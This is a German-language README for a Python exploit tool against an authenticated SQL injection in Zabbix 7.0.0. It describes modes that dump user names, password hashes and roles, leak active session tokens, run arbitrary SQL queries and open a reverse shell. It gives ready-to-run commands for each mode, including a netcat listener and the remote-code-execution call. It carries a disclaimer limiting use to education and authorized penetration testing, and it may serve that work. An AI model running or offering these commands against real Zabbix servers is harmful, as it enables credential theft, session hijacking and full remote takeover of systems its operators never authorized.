
Dies ist nur für Bildungszwecke gedacht. Bitte nicht gegen unbefugte Systeme verwenden.
Ein Python-Skript zur Ausnutzung einer authentifizierten SQL-Injection-Schwachstelle in Zabbix 7.0.0, das mehrere Aktionsmodi unterstützt, darunter Extraktion von Benutzerdaten, Sitzungstoken-Leaks, Remote-Befehlsausführung (RCE) und benutzerdefinierte Abfrageinjektion.
⚠️ HAFTUNGSAUSSCHLUSS:
Dieses Skript dient ausschließlich pädagogischen und autorisierten Penetrationstest-Zwecken.
Verwenden Sie es nicht auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
requests BibliothekInstallieren Sie die Abhängigkeiten bei Bedarf:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| Modus | Beschreibung | Erfordert Admin-Token |
|---|---|---|
| leak-users | Gibt alle Benutzer-IDs, Benutzernamen, Passwort-Hashes und Rollen aus | ❌ |
| leak-tokens | Gibt alle aktiven Sitzungs-IDs aus der Datenbank aus | ❌ |
| rce | Startet eine Reverse Shell über den item.create-Exploit | ✅ |
| custom | Führt eine beliebige benutzerdefinierte SQL-Abfrage über die Injektion aus | ❌ |
Benutzer-Hashes auslesen
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
Sitzungstoken preisgeben
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
Remote-Codeausführung (Reverse Shell)
# Zuerst einen Listener starten:
nc -lvnp 9001
# Dann ausführen:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
Benutzerdefinierte SQL-Injektion
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Haupt-Exploit-Skript
README.md # Diese Dokumentation
Anthony (@874anthony)
Mit Liebe und Neugierde erstellt 🐍
Dieses Projekt wird unter der MIT-Lizenz veröffentlicht. Bitte verwenden Sie es verantwortungsbewusst.